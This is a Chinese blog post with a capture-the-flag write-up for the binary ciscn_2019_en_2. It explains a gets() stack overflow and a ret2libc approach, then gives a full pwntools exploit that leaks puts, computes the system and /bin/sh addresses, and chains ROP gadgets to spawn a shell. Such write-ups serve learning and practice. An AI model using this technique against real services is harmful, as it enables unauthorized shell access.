【CTF】ciscn_2019_en_2

最新推荐文章于 2023-05-14 14:58:10 发布
最新推荐文章于 2023-05-14 14:58:10 发布
阅读量3.7k 收藏 1
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011317663/article/details/122707691
版权

解题思路:

1 先反编译,粗略看了下,溢出点应该在encrypt函数里(只贴关键部分):

void encrypt(char *__block,int __edflag)
{
  size_t sVar1;
  long lVar2;
  ulong uVar3;
  undefined8 *puVar4;
  undefined8 local_58 [9];
  ...
  *(undefined2 *)puVar4 = 0;
  puts("Input your Plaintext to be encrypted");
  gets((char *)local_58); // 可溢出
  ....
}

找溢出位置时,出问题的rsp是加密后的文本,需要到加密后的文本里去算偏移。
2 找可利用函数,未找到。看来应该是return to libc。首先需要获取某libc函数的内存地址,有puts函数,直接就用puts了。
puts 在got的位置:
00602020 addr puts
puts在plt的位置:
004006e0 addr puts
(这部分还得回去再翻翻书,got和plt的关系)
3 剩下的都是常规操作了:

  1. 获取对应libc的system、puts、/bin/sh的地址。
  2. 计算system、/bin/sh到puts的偏移
  3. 根据获取的puts的内存地址,计算system、/bin/sh的内存地址
  4. 找gadget,根据计算的内存地址构造输入

4 脚本如下(代码未优化):

from pwn import *
from pwnlib.shellcraft import i386
import time
elf = ELF('ciscn_2019_en_2') 
so = ELF('/lib/x86_64-linux-gnu/libc.so.6') # 需要ELF信息对应的libc

so_system_addr = so.symbols['system'] # 获取system在libc中的位置
so_puts_addr = so.symbols['puts']  # 获取puts在libc的位置
so_binsh_addr = next(so.search(b'/bin/sh')) # 获取/bin/sh在libc的位置
print("so_system_addr: " + hex(so_system_addr))
print("so_puts_addr: " + hex(so_puts_addr))
print("so_binsh_addr: " + hex(so_binsh_addr))
system_puts_offset = so_system_addr - so_puts_addr # 计算system到puts的偏移
binsh_puts_offset = so_binsh_addr - so_puts_addr  # 计算/bin/sh到puts的偏移

sh = process('ciscn_2019_en_2')
#sh = remote('127.0.0.1', 1299)
pattern_str = 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
nops = b"\x90" * (88)
rop = nops
elf_puts = elf.symbols['puts']
print(hex(elf_puts))
rop  += p64(0x00400c20) # __libc_csu_init 用于栈平衡
#rop  += p64(0x00602020) # got puts
rop  += p64(0x00400c83) # pop rdi; ret
rop  += p64(0x00602020) # got puts  打印puts的内存地址
rop  += p64(elf_puts) # elf puts
rop  += p64(0x00400c20) # __libc_csu_init
rop  += p64(0x00400b28) # main 重新跳到main函数
#rop += pattern_str.encode() # 为了计算跳到main的溢出点

print(rop)
with open("payload.txt", "wb") as f:
    f.write(b'1\n' + rop) # 前面加1'\n',是为了r < payload.txt时,自动填充第一个输入
    
#time.sleep(5)
print("round 2")
sh.recvuntil('choice')
sh.sendline('1')
sh.recvuntil('encrypted')
sh.sendline(rop)

s = sh.recvline()
print(s)
s = sh.recvline()
print(s)
s = sh.recvline()
print(s)
s = sh.recvline()
print(s)

puts_mem_addr = int.from_bytes(s[:-1],'little') # 获取puts的内存地址
system_mem_addr = puts_mem_addr + system_puts_offset  # 计算system的内存地址
binsh_mem_addr = puts_mem_addr + binsh_puts_offset # 计算/bin/sh的内存地址
print("puts_mem_addr: " + hex(puts_mem_addr))
print("system_mem_addr: " + hex(system_mem_addr))
print('binsh_mem_addr: ' + hex(binsh_mem_addr))


rop = nops
rop  += p64(0x00400c20) # __libc_csu_init
rop  += p64(0x00400c83) # pop rdi; ret
rop  += p64(binsh_mem_addr) # /bin/sh
rop  += p64(system_mem_addr) # system

sh.recvuntil('choice')
sh.sendline('1')
sh.recvuntil('encrypted')
sh.sendline(rop)
sh.interactive()

总结:

做这道题,思路其实一直比较清晰,但是花的时间比预计的要多些,还是具体到操作层面时工具或者方法不够熟练.

附录:

1 一步一步学ROP之linux_x64篇

delta_hell
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
[BUUCTF]ciscn_2019_en_2解题思路
ctfpwn的博客
05-08 269
接下来通过计算偏移和libcsearcher拿到libc版本从而泄露system和bin/sh然后栈溢出获得shell。先用ROPgadget --binary fliename --only 'pop|ret' 找找gadgets。通过读c伪代码可以看出先是一个嵌套循环,然后输入v4的值,根据v4值来执行下面的代码。其中的0x4009A0是用来泄露puts函数的地址后返回encrypt函数再次运行。希望思路对各位有所帮助(本人真的很菜),如有不足请各位佬们指点。很明显有个gets函数的栈溢出。
ciscn_2019_en_2
m0sway的博客
03-25 1572
ciscn_2019_en_2 WriteUp BUU_PWN
[CTF]BUUCTF-PWN-ciscn_2019_en_2
weixin_53394081的博客
04-11 247
CTF】BUUCTF-ciscn_2019_en_2 pwn
CTF-Solyd_2019
02-11
CTF 2019 Solyd Resoluçãoda CTF de 2019 da
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF神器_ctf
09-23
对网站文件管理,对网站后台文件进行扫描。。
BUUCTF 刷题 ciscn_2019_en_21
Helloity的博客
02-07 563
ctf刷题
buuctf|ciscn_2019_en_2 1
m0_64236521的博客
05-02 632
ciscn_2019_en_2 1 下载后我重命名为pwn_14了 checksec一下 nx开启,可以栈溢出 64位,用ida看看 分析下,只有输入‘1’有用,即encrypt函数较为重要,进入encrypt 有gets(s),可以进行栈溢出,没有找到后门函数。 那基本思路有了,这里可以栈溢出,但要绕过strlen判断,之后就是基本的ROP,ret2libc。 exp如下 from pwn import* from LibcSearcher import* context(os='linux', ar
BUUCTF ciscn_2019_en_2
小白垃圾笔记2
05-14 109
脚本2和3的区别就是puts的返回地址覆盖不同而已。注意这个64位程序。所以在搜索的时候需要选择amd64那个。只有输入1的时候才会进入encrypt函数,否则会退出。前边调用最多的就是puts,那就通过puts泄露libc。脚本一是本地调试,其中的libc路径是ldd看的。有一个根据strlen函数进行加密的运算。小白垃圾做题笔记,不建议阅读。
BUUCTF pwn——ciscn_2019_en_2
CNS-Enterprise BCC-1701-J
04-05 125
BUUCTF 做题练习
Linux程式设计(转载)二
03-22 1032
Linux程式设计- 6.syslog在Linux下有个syslogd的Daemon程式,syslog是个系统管理员必看的档案。因此,如果您的程式有除错或安全讯息要显示,写到syslog是个很好的选择。 syslog有三个函数,使用上,一般您只需要用syslog(...)这个函数即可,一般使用状况下,openlog/closelog是可有可无的。 syslog()中的priority是fa
ctf Web_php_include
08-28
2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值